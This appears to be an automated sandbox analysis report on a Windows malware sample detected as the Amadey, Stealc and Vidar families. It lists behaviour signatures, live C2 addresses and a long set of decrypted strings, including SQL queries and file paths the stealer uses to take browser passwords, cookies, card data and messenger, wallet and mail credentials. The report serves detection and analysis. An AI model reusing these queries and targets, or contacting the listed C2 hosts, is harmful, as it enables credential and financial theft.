Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1570352
MD5: ec0745bf77524d3c74c33d99cf8965c0
SHA1: fb8a999984b6ef511cad2b5274f39097f29e9824
SHA256: 6a9bcf5a71115d675d22b7fafec11f27ce9aafd64ea717096b96b9da875bcbbf
Tags: exe, user-Bitsight

Detection

Amadey, Stealc, Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Drops PE files to the document folder of the user
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for dropped file
Machine Learning detection for sample
Monitors registry run keys for changes
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name: Vidar
Description: Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that grabs information on 2FA software and the Tor Browser.
Attribution: No Attribution
Blogpost URLs:
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

AV Detection

Source: file.exe Avira: detected
Source: http://185.215.113.206/c4becf79229cb002.phpLy Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/sqlite3.dllk Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dll. Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/mozglue.dllu Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.php423177b60194262422f8d727cf88 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpDI Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Avira: detection malicious, Label: TR/Crypt.XPACK.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0.2.file.exe.3a0000.0.unpack Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php", "Botnet": "drum"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe ReversingLabs: Detection: 36%
Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe ReversingLabs: Detection: 36%
Source: file.exe ReversingLabs: Detection: 47%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\random[1].exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 07
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 01
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 20
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: 25
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetProcAddress
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: LoadLibraryA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: lstrcatA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: OpenEventA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateEventA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CloseHandle
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Sleep
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: VirtualFree
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetSystemInfo
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: VirtualAlloc
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HeapAlloc
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetComputerNameA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: lstrcpyA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetProcessHeap
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetCurrentProcess
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: lstrlenA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ExitProcess
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetSystemTime
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: advapi32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: gdi32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: user32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: crypt32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetUserNameA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateDCA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetDeviceCaps
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ReleaseDC
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sscanf
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: VMwareVMware
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HAL9TH
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: JohnDoe
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DISPLAY
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: http://185.215.113.206
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: drum
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetFileAttributesA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HeapFree
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetFileSize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GlobalSize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: IsWow64Process
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Process32Next
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetLocalTime
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: FreeLibrary
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Process32First
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DeleteFileA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: FindNextFileA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: LocalFree
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: FindClose
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: LocalAlloc
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetFileSizeEx
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ReadFile
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SetFilePointer
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: WriteFile
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateFileA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: FindFirstFileA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CopyFileA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: VirtualProtect
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetLastError
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: lstrcpynA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GlobalFree
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GlobalAlloc
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: OpenProcess
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: TerminateProcess
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: gdiplus.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ole32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: bcrypt.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: wininet.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: shlwapi.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: shell32.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SelectObject
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BitBlt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DeleteObject
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdiplusStartup
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdiplusShutdown
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipDisposeImage
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GdipFree
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CoUninitialize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CoInitialize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CoCreateInstance
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptDecrypt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptSetProperty
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetWindowRect
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetDesktopWindow
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetDC
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CloseWindow
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: wsprintfA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CharToOemW
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: wsprintfW
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RegQueryValueExA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RegCloseKey
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RegEnumValueA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CryptUnprotectData
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ShellExecuteExA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: InternetConnectA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: InternetCloseHandle
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HttpSendRequestA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: InternetReadFile
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: StrCmpCA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: StrStrA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: StrCmpCW
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PathMatchSpecA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: GetModuleFileNameExA
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RmStartSession
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RmRegisterResources
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RmGetList
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: RmEndSession
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_open
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_prepare_v2
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_step
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_column_text
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_finalize
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_close
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_column_bytes
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: sqlite3_column_blob
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: encrypted_key
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PATH
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: C:\ProgramData\nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: NSS_Init
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: NSS_Shutdown
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PK11_GetInternalKeySlot
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PK11_FreeSlot
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PK11_Authenticate
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: PK11SDR_Decrypt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: C:\ProgramData\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT origin_url, username_value, password_value FROM logins
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: browser:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: profile:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: url:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: login:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: password:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Opera
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: OperaGX
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Network
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: cookies
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: .txt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: TRUE
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: FALSE
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: autofill
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: history
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: cc
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: name:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: month:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: year:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: card:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Cookies
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Login Data
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Web Data
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: History
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: logins.json
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: formSubmitURL
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: usernameField
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: encryptedUsername
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: encryptedPassword
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: guid
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: cookies.sqlite
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: formhistory.sqlite
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: places.sqlite
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: plugins
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Local Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Sync Extension Settings
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: IndexedDB
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Opera Stable
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Opera GX Stable
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: CURRENT
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: chrome-extension_
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Local State
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: profiles.ini
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: chrome
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: opera
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: firefox
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: wallets
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: ProductName
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: x32
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: x64
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DisplayName
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: DisplayVersion
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Network Info:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - IP: IP?
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Country: ISO?
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: System Summary:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - HWID:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - OS:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Architecture:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - UserName:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Computer Name:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Local Time:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - UTC:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Language:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Keyboards:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Laptop:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Running Path:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - CPU:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Threads:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Cores:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - RAM:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - Display Resolution:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: - GPU:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: User Agents:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Installed Apps:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: All Users:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Current User:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Process List:
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: system_info.txt
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: freebl3.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: mozglue.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: msvcp140.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: nss3.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: softokn3.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: vcruntime140.dll
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Temp\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: .exe
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: runas
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: open
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: /c start
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %DESKTOP%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %APPDATA%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %USERPROFILE%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: %RECENT%
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: *.lnk
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: files
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \discord\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: key_datas
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: map*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Telegram
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Tox
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: *.tox
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: *.ini
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Password
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.3a0000.0.unpack String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
